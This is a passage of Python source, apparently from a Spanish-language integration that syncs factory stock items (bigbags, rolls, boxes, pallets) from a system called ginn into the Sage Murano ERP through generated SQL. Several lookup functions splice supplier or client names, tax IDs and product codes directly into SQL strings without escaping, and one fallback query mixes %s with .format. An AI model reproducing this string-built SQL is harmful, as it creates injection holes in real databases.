bigbag.codigo)\n # Será True si estoy intentando consumir otra vez al validar de nuevo\n # un parte que se haya quedado a la mitad por lo que sea. Idempotente.\n res = esta_consumido(bigbag, bigbag.parteDeProduccion)\n else:\n try:\n partida = bigbag.loteCem.codigo\n except AttributeError:\n partida = \"\" # Balas C no tienen lote. No pasa nada. Murano traga.\n unidad_medida = \"KG\"\n comentario = \"Consumo bigbag [ginn] {}\".format(bigbag.get_info())[:40]\n serie = 'FAB'\n ubicacion = \"Almac. de fibra.\"[:15]\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto,\n fecha=fecha) # pylint: disable=bad-continuation\n try:\n documento = bigbag.parteDeProduccion.id # Única forma\n # numérica de localizarlo.\n except AttributeError:\n pass # Dejo la fecha, que es valor por defecto que trae.\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = \"CONSBB\"[:10]\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n # pylint: disable=redefined-variable-type\n # Si es una simulación, devuelvo las consultas SQL y no un bool.\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En el movimiento de serie la UnidadMedida1_ es la básica:ROLLO,BALA..\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = bigbag.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n # Solo actualizo el valor del api si no se ha simulado y estoy\n # seguro de que en Murano se ha descontado el bigbag. Prefiero\n # intentar volver a consumir el mismo bigbag que creer que se\n # ha consumido y no volverlo a intentar jamás dejando un\n # descuadre entre ginn y Murano.\n if check_api:\n # ¿Se ha consumido pero no tiene el valor `api` bien?\n res = esta_consumido(bigbag.articulo,\n bigbag.parteDeProduccion)\n bigbag.api = res\n bigbag.syncUpdate()\n # bigbag.sync()\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef create_bigbag(bigbag, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, comentario=None, serie='API', fecha=None):\n \"\"\"\n Crea un bigbag en Murano a partir de la información del bigbag en ginn.\n Si cantidad = -1 realiza un decremento en el almacén de Murano.\n Si no se especifica comentario, se usa uno por defecto.\n \"\"\"\n articulo = bigbag.articulo\n if cantidad > 0 and duplica_articulo(articulo):\n logging.warning(\"El bigbag %s ya existe en Murano. Se ignora.\",\n articulo.codigo)\n else:\n partida = bigbag.loteCem.codigo\n # Si comentario es \"\", viene de fabricación. Serie FAB.\n if not comentario:\n comentario = \"[ginn] {}\".format(bigbag.get_info())\n serie = 'FAB'\n comentario = comentario[:40] # Por restricciones de Murano.\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n ubicacion = \"Almac. de fibra.\"[:15]\n unidad_medida = \"KG\"\n # pylint: disable=bad-continuation\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto, codigo_almacen, calidad, fecha=fecha)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En movimiento de serie la UnidadMedida1_ es la básica: ROLLO, BALA...\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = bigbag.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef create_rollo(rollo, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, comentario=None, serie='API', fecha=None):\n \"\"\"\n Crea un rollo en Murano a partir de la información del rollo en ginn.\n Si cantidad = -1 realiza un decremento en el almacén de Murano.\n Si no se especifica comentario, se usa uno por defecto.\n \"\"\"\n articulo = rollo.articulo\n if cantidad > 0 and duplica_articulo(articulo):\n logging.warning(\"El rollo %s ya existe en Murano. Se ignora.\",\n articulo.codigo)\n else:\n try:\n partida = rollo.partida.codigo\n except AttributeError:\n partida = \"\" # DONE: Los rollos C no tienen partida. No pasa nada\n # Si comentario es \"\", viene de fabricación. Serie FAB.\n if not comentario:\n comentario = \"[ginn] {}\".format(rollo.get_info())\n serie = 'FAB'\n comentario = comentario[:40] # Por restricciones de Murano.\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n ubicacion = \"Almac. de geotextiles.\"[:15]\n if articulo.get_str_calidad() == \"C\":\n # Los productos C se almacenan y venden en kg. No tienen largo y\n # ancho medible.\n unidad_medida = \"KG\"\n else:\n unidad_medida = \"M2\"\n # pylint: disable=bad-continuation\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto, codigo_almacen, calidad, fecha=fecha)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En movimiento de serie la UnidadMedida1_ es la básica: ROLLO, BALA...\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n superficie = get_superficie(articulo) or 0\n numero_serie_lc = rollo.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto, superficie,\n # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef create_caja(caja, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, comentario=None, serie='API', fecha=None):\n \"\"\"\n Crea una caja en Murano a partir de la información del objeto caja en ginn.\n Si cantidad es 1, realiza un decremento.\n Si no se especifica comentario, se usa uno por defecto.\n \"\"\"\n articulo = caja.articulo\n if cantidad > 0 and duplica_articulo(articulo):\n logging.warning(\"La caja %s ya existe en Murano. Se ignora.\",\n articulo.codigo)\n else:\n partida = caja.partidaCem.codigo\n unidad_medida = \"KG\"\n # Si comentario es \"\", viene de fabricación. Serie FAB.\n if not comentario:\n comentario = \"[ginn] {}\".format(caja.get_info())\n serie = 'FAB'\n comentario = comentario[:40] # Por restricciones de Murano.\n ubicacion = \"Almac. de fibra embolsada.\"[:15]\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n # pylint: disable=bad-continuation\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto, codigo_almacen, calidad, fecha=fecha)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En movimiento de serie la UnidadMedida1_ es la básica: ROLLO, BALA...\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = caja.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n caja.pale and caja.pale.codigo or \"\"\n # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\n# pylint: disable=too-many-arguments\ndef create_pale(pale, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, observaciones=None,\n serie=\"API\", check_api=True):\n \"\"\"\n Crea un palé con todas sus cajas en Murano a partir del palé de ginn.\n\n Si cantidad es -1 saca el palé del almacén.\n\n Si `check_api` es True comprueba que el valor del campo api es correcto: si\n las cajas del palé ya existen en Murano con el mismo producto pero el valor\n de api para el artículo es False (por algún fallo anterior, por ejemplo),\n se cambia a True.\n \"\"\"\n assert observaciones is not None, \"murano.ops.create_pale::\"\\\n \"Debe indicar el motivo en el parámetro «observaciones».\"\n # Los palés se crean automáticamente al crear las cajas con el código de\n # palé informado. No hay que crear movimiento de stock ni de número de\n # serie para eso.\n # El palé no es más que un campo en las tablas de movimientos de stock, de\n # modo que no es necesario siquiera comprobar si existe. Lo que se\n # comprobarán serán sus cajas una a una para evitar duplicados.\n i = 0\n cajas = pale.cajas\n totcajas = len(cajas)\n if VERBOSE:\n # pylint: disable=import-error\n from lib.tqdm.tqdm import tqdm # Barra de progreso modo texto.\n cajas = tqdm(cajas, total=totcajas, leave=False)\n for caja in cajas:\n i += 1\n if VERBOSE:\n cajas.set_description(\"Creando caja %s... (%d/%d)\" % (\n caja.codigo, i, totcajas))\n # La primera caja instanaciará el IdProcesoIME y se lo iré pasando\n # a las demás cajas. No lanzo el fire de ninguna de ellas. Lo haré\n # cuando tenga el palé completo.\n guid_proceso = create_caja(caja,\n cantidad=cantidad,\n producto=producto,\n guid_proceso=guid_proceso,\n simulate=simulate,\n procesar=False,\n comentario=observaciones,\n serie=serie)\n # No es necesario. Cada caja lanza su proceso y el palé no crea\n # registros en la base de datos. No hay que lanzar ninún proceso adicional.\n if procesar:\n if guid_proceso: # Si todas las cajas ya existían,guid_proceso es None\n res = fire(guid_proceso)\n else: # Nada que insertar. Nada insertado. Resultado, False.\n res = False\n else:\n res = guid_proceso\n # if not res: # No se han insertado todas las cajas del palé.\n if check_api: # Puede que porque ya existan. Si es así, corrijo `api`\n # Compruebo y actualizo API de todos modos porque por algún motivo\n # que no tengo tiempo ahora de investigar, las cajas no se ponen\n # a True aunque se vuelquen bien a Murano. check_api es True por defec.\n for caja in cajas:\n articulo = caja.articulo\n articulo.api = existe_articulo(articulo)\n articulo.syncUpdate()\n # pale.api es propiedad. Será True si todas sus cajas son api=True.\n res = pale.api\n return res\n\n\ndef consulta_proveedor(nombre=None, cif=None):\n \"\"\"\n Obtiene los datos de un proveedor buscando por nombre, cif o ambas cosas.\n Devuelve una lista de proveedores coincidentes en forma de diccionarios\n campo:valor para cada registro.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n sql = \"SELECT * FROM %s.dbo.Proveedores WHERE \" % (c.get_database())\n where = []\n if nombre:\n where.append(\"Nombre = '%s'\" % nombre)\n if cif:\n where.append(\"CifDni = '%s'\" % cif)\n if nombre and cif:\n where = \" AND \".join(where) # py lint: disable=redefined-variable-type\n else:\n where = where[0]\n where += \";\"\n sql += where\n res = c.run_sql(sql)\n return res\n\n\ndef consulta_cliente(nombre=None, cif=None):\n \"\"\"\n Obtiene los datos de un cliente buscando por nombre, cif o ambas cosas.\n Devuelve una lista de clientes coincidentes.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n sql = \"SELECT * FROM %s.dbo.Clientes WHERE \" % (c.get_database())\n where = []\n if nombre:\n where.append(\"Nombre = '%s'\" % nombre)\n if cif:\n where.append(\"CifDni = '%s'\" % cif)\n if nombre and cif:\n where = \" AND \".join(where) # pylint: disable=redefined-variable-type\n else:\n where = where[0]\n where += \";\"\n sql += where\n res = c.run_sql(sql)\n return res\n\n\ndef consultar_producto(producto=None, nombre=None, ean=None):\n \"\"\"\n Busca un producto por nombre, si se especifica el parámetro.\n Si no, y lo que recibe es el código EAN, busca por ese código.\n En otro caso, busca por el código `[PC|PV]id`. Se debe recibir el objeto\n producto de pclases.\n Devuelve una lista de productos coincidentes.\n \"\"\"\n assert not producto == nombre == ean == None # NOQA\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n if nombre:\n try:\n sql = \"SELECT * FROM {}.dbo.Articulos WHERE \".format(\n c.get_database())\n where = r\"DescripcionArticulo = '{}'\".format(nombre)\n where += r\" AND CodigoEmpresa = '{}';\".format(CODEMPRESA)\n sql += where\n res = c.run_sql(sql)\n # Busco por descripción, y si no lo encuentro, busco por la\n # descripción ampliada. Por eso hago esta asignación:\n # pylint: disable=unused-variable\n record = res[0] # NOQA\n except IndexError:\n sql = \"SELECT * FROM %s.dbo.Articulos WHERE \".format(\n c.get_database())\n where = r\"Descripcion2Articulo = '{}'\".format(nombre)\n where += r\" AND CodigoEmpresa = '{}';\".format(CODEMPRESA)\n sql += where\n res = c.run_sql(sql)\n except TypeError: # res es None. Error con la base de datos\n if DEBUG:\n res = [] # pylint: disable=redefined-variable-type\n elif ean: # Busco por código EAN (CodigoAlternativo)\n sql = \"SELECT * FROM %s.dbo.Articulos WHERE \" % (c.get_database())\n where = r\"CodigoAlternativo = '%s'\" % (ean)\n where += r\" AND CodigoEmpresa = '{}';\".format(CODEMPRESA)\n sql += where\n res = c.run_sql(sql)\n else: # Busco por el código de Murano: PC|PV + ID\n idmurano = get_codigo_articulo_murano(producto)\n sql = \"SELECT * FROM %s.dbo.Articulos WHERE \" % (c.get_database())\n where = r\"CodigoArticulo = '%s'\" % (idmurano)\n where += r\" AND CodigoEmpresa = '{}';\".format(CODEMPRESA)\n sql += where\n res = c.run_sql(sql)\n if DEBUG:\n try:\n assert len(res) == 1\n except AssertionError:\n if not res or len(res) == 0:\n raise AssertionError(\"No se encontraron registros.\")\n elif len(res) > 1:\n raise AssertionError(\"Se encontró más de un artículo:\\n %s\" % (\n \"\\n\".join([str(i) for i in res])))\n return res\n\n\n# pylint: disable=unused-argument\ndef update_calidad(articulo, calidad, comentario=None, serie=\"API\",\n force=False, fecha=None):\n \"\"\"\n Cambia la calidad del artículo en Murano a la recibida. Debe ser A, B o C.\n\n Si el cambio es a calidad C hay casos donde se requiere un cambio de\n producto además de calidad. En ese caso solo se permite si el parámetro\n `force` es True.\n \"\"\"\n if calidad not in \"aAbBcC\":\n raise ValueError(\"El parámetro calidad debe ser A, B o C.\")\n # DONE: [Marcos Sage] No modificamos tablas. Hacemos salida del producto A\n # y volvemos a insertarlo como C. En ese caso no importa que se repita el\n # código para el mismo producto porque antes hemos hecho la salida.\n if calidad in \"Cc\" and not force:\n # TODO: Ojo porque si cambio a calidad C probablemente implique un\n # cambio de producto.\n raise NotImplementedError(\"Función no disponible por el momento.\")\n else:\n if not comentario:\n observaciones_baja = \"Baja por cambio a calidad {}\".format(calidad)\n else:\n observaciones_baja = comentario\n res = delete_articulo(articulo,\n observaciones=observaciones_baja,\n serie=serie, fecha=fecha)\n if res:\n if not comentario:\n observaciones_alta = \"Alta por cambio a calidad {}.\".format(\n calidad)\n else:\n observaciones_alta = comentario\n res = create_articulo(articulo, calidad=calidad,\n observaciones=observaciones_alta,\n serie=serie, fecha=fecha)\n return res\n\n\ndef update_peso(articulo, peso_real):\n \"\"\"\n Recibe un artículo **ya** volcado a Murano y actualiza el peso en Murano\n y en ginn.\n 0. Elimina el artículo de Murano.\n 1. Desmarca el artículo como volcado en ginn.\n 2. Actualiza el peso bruto, neto y real en ginn teniendo en cuenta peso de\n embalaje y demás.\n 3. Vuelca el artículo de nuevo a Murano.\n 4. Se comprueba el campo `api` respecto al resultado del volcado.\n \"\"\"\n serie = 'API'\n peso_anterior = articulo.peso_real\n observaciones = 'Cambio de peso de {} a {}.'.format(peso_anterior,\n peso_real)\n res = delete_articulo(articulo, observaciones=observaciones, serie=serie)\n if res:\n articulo.api = False\n articulo.set_peso_real(peso_real)\n articulo.api = create_articulo(articulo, observaciones=observaciones,\n serie=serie)\n articulo.sync()\n res = articulo.api\n return res\n\n\ndef duplica_articulo(articulo, producto=None):\n \"\"\"\n Devuelve True si al crear el artículo recibido con el producto indicado\n (o el que tenga asignado el artículo, si es None) crearía un duplicado.\n Es decir, si el artículo no existía en Murano (no tiene registro de\n movimiento de serie), devuelve False (no lo duplicaría si lo creara).\n Si el artículo ya existe en Murano pero ha salido en un movimiento de\n borrado desde fabricación --y no por albarán-- entonces tampoco lo\n duplicaría, devuelve False. Si el movimiento es de ajuste manual\n de salida, tampoco lo duplicaría.\n True en el resto de los casos (existe y el último movimiento es de\n albarán o de entrada de fabricación).\n Si tiene un movimiento de entrada de fabricación pero con otro producto,\n **sí** que duplicaría el código (que es lo que comprueba existe_articulo).\n \"\"\"\n if not isinstance(articulo, pclases.Articulo):\n # Por error o por pruebas he recibido directamente el código del\n # artículo.\n articulo = pclases.Articulo.get_articulo(articulo)\n if not producto:\n producto = articulo.productoVenta\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n if (not movserie or\n es_movimiento_salida_fabricacion(movserie) or\n es_movimiento_ajuste_api(movserie) or\n es_movimiento_salida_manual(movserie)):\n res = False\n else:\n res = True\n return res\n\n\ndef existe_articulo(articulo, productoVenta=None):\n \"\"\"\n Devuelve True si el artículo ya existe en Murano **Y** es del producto\n recibido. Si ni se recibe producto, se mira si existe con el producto del\n propio artículo según ginn.\n Se permite especificar producto para el caso del cambio de\n producto, donde no me interesa si el artículo existe, sino que si existe\n con el producto de destino para no duplicarlo.\n Se considera que si un artículo ha salido del almacén, sigue existiendo\n en Murano. Esto evita que se dupliquen códigos y se respete la\n trazabilidad.\n Recibe un objeto artículo de ginn.\n \"\"\"\n if not isinstance(articulo, pclases.Articulo):\n # Por error o por pruebas he recibido directamente el código del\n # artículo.\n articulo = pclases.Articulo.get_articulo(articulo)\n if not productoVenta:\n productoVenta = articulo.productoVenta\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(c, articulo)\n if not movserie:\n res = False\n else:\n codigo_producto_venta_actual = movserie['CodigoArticulo']\n codigo_producto_venta_preguntado = get_codigo_articulo_murano(\n productoVenta)\n res = codigo_producto_venta_actual == codigo_producto_venta_preguntado\n return res\n\n\ndef esta_en_almacen(articulo):\n \"\"\"\n Devuelve el código de almacén si el artículo está en algún almacén de\n Murano. Sea del producto que sea.\n False en caso contrario.\n \"\"\"\n if not isinstance(articulo, pclases.Articulo):\n # Por error o por pruebas he recibido directamente el código del\n # artículo.\n articulo = pclases.Articulo.get_articulo(articulo)\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n # movserie = get_ultimo_movimiento_articulo_serie(c, articulo)\n # if not movserie:\n # # Si no ha tenido movimientos de serie, nunca ha existido en Murano.\n # res = False\n # else:\n # if es_movimiento_de_salida(movserie):\n # # Ha tenido movimientos, pero el último ha sido de salida.\n # res = False\n # else:\n # res = True\n sql = \"\"\"SELECT CodigoAlmacen\n FROM {}.dbo.ArticulosSeries\n WHERE CodigoEmpresa = {}\n AND UnidadesSerie > 0\n AND NumeroSerieLc = '{}'\n ORDER BY FechaInicial;\"\"\".format(c.get_database(), CODEMPRESA,\n articulo.codigo)\n articulos_serie = c.run_sql(sql)\n try:\n almacen = articulos_serie[-1]['CodigoAlmacen']\n except IndexError:\n almacen = None\n if not almacen:\n res = False\n else:\n res = almacen\n return res\n\n\ndef get_precio_coste(articulo):\n \"\"\"\n Devuelve el precio de coste por kg según Murano del artículo de ginn\n recibido.\n Se supone que debe coincidir con el que estaba definido para su familia\n en el mes en que se dio de alta.\n Es diferente al buscar_precio_coste para Murano, que devuelve el mismo\n valor pero desde la tabla Familias directamente. Sin tener en cuenta\n la tabla de precios de coste por mes.\n \"\"\"\n if not isinstance(articulo, pclases.Articulo):\n # Por error o por pruebas he recibido directamente el código del\n # artículo.\n articulo = pclases.Articulo.get_articulo(articulo)\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n # Esto sería si en Sage lo hubiesen hecho bien. Pero la realidad es otra.\n # sql = \"\"\"SELECT GEO_CosteUnidadEspecifica\n # FROM {}.dbo.ArticulosSeries\n # WHERE CodigoEmpresa = {}\n # AND UnidadesSerie > 0\n # AND NumeroSerieLc = '{}'\n # ORDER BY FechaInicial;\"\"\".format(conn.get_database(), CODEMPRESA,\n # articulo.codigo)\n # Solo se han acordado de actualizar los movimientos de stock. Así que\n # tenemos que dar un rodeo para conseguir el valor.\n # OJO: ¿El último es el que tiene el precio bien? ¿Y si es un movimiento\n # de salida de stock y va el precio que le hemos dado al cliente? Bueno,\n # entonces no estará en stock. Aparte, inexplicablemente, el JOIN siempre\n # devuelve un único movimiento FAB. Para la salida de albarán de\n # MovimientoArticuloSerie no hay MovimientoStock. Pero ojo con los borrados\n # y nuevas creaciones. Ahí sí habrá más de un MovimientoStock. **Yo me\n # quedo siempre con el más reciente.**\n sql = \"\"\"SELECT Precio\n FROM {DB}.dbo.MovimientoArticuloSerie\n JOIN {DB}.dbo.MovimientoStock\n ON {DB}.dbo.MovimientoArticuloSerie.MovPosicionOrigen\n = {DB}.dbo.MovimientoStock.MovPosicion\n WHERE {DB}.dbo.MovimientoStock.CodigoEmpresa = {CE}\n AND {DB}.dbo.MovimientoArticuloSerie.NumeroSerieLc = '{cod}'\n ORDER BY {DB}.dbo.MovimientoStock.Fecha DESC;\"\"\".format(\n DB=conn.get_database(),\n CE=CODEMPRESA,\n cod=articulo.codigo)\n # DONE: ¿Y los cambios de producto, qué? Bueno, pues lo mismo. El más\n # reciente es el último alta en la base de datos. El producto definitivo.\n articulos_serie = conn.run_sql(sql)\n try:\n precio_coste = articulos_serie[0]['Precio']\n except IndexError:\n precio_coste = None\n if not precio_coste:\n res = 0.0\n else:\n res = precio_coste\n return res\n\ndef es_movimiento_de_salida(movserie):\n \"\"\"\n Recibe un registro MovimientoArticuloSerie de Murano (diccionario) y\n devuelve True si es un movimiento de salida.\n No tiene en cuenta si es un interalmacén (lo tomará como salida también).\n \"\"\"\n res = (es_movimiento_salida_fabricacion(movserie) or\n es_movimiento_ajuste_api(movserie) or\n es_movimiento_salida_albaran(movserie))\n return res\n\n\ndef get_producto_articulo_murano(articulo):\n \"\"\"\n Devuelve el pclases.ProductoVenta que tenga asignado el artículo en Murano.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n if movserie:\n murano_id = movserie['CodigoArticulo']\n pv = get_producto_ginn(murano_id)\n else: # Nunca ha entrado en Murano.\n pv = None\n return pv\n\n\ndef es_movimiento_salida_fabricacion(movserie):\n \"\"\"\n True si el registro MovimientoArticuloSerie es de salida de fabricación\n (borrado en partes o consumo).\n OrigenDocumento es 2 para altas y 11 para bajas.\n \"\"\"\n res = (movserie['OrigenDocumento'] == SALIDA and\n movserie['SerieDocumento'] == 'FAB')\n return res\n\n\ndef es_movimiento_ajuste_api(movserie):\n \"\"\"\n True si el registro MovimientoArticuloSerie es de salida de fabricación\n (borrado en partes).\n \"\"\"\n res = (movserie['OrigenDocumento'] == SALIDA and\n movserie['SerieDocumento'] == 'API')\n return res\n\n\ndef es_movimiento_salida_manual(movserie):\n \"\"\"\n True si el registro MovimientoArticuloSerie es de salida por un ajuste\n manual por entrada/salida de movimientos de Murano.\n OJO: Esos movimientos los debe marcar el usuario como \"MAN\" en la Serie.\n \"\"\"\n res = (movserie['OrigenDocumento'] == SALIDA and\n movserie['SerieDocumento'] == 'MAN')\n return res\n\n\ndef es_movimiento_entrada_manual(movserie):\n \"\"\"\n True si el registro MovimientoArticuloSerie es de entrada por un ajuste\n manual por entrada/salida de movimientos de Murano.\n OJO: Esos movimientos los debe marcar el usuario como \"MAN\" en la Serie.\n \"\"\"\n res = (movserie['OrigenDocumento'] == ENTRADA and\n movserie['SerieDocumento'] == 'MAN')\n return res\n\n\ndef es_movimiento_salida_albaran(movserie):\n \"\"\"\n Devuelve el número de albarán (evaluable como True) por el que ha salido\n el artículo indicado en el registro MovimientoArticuloSerie.\n \"\"\"\n if movserie['OrigenDocumento'] == VENTA:\n serie = movserie['SerieDocumento']\n documento = movserie['Documento']\n res = serie + str(documento)\n else:\n res = False\n return res\n\n\ndef iter_create_articulos(articulos, simulate=False, serie='API', fecha=None,\n cantidad=1):\n \"\"\"\n Crea en Murano **en un solo proceso de importación** los artículos de\n _ginn_ recibidos en una lista.\n Si `simulate` es True, no conecta con 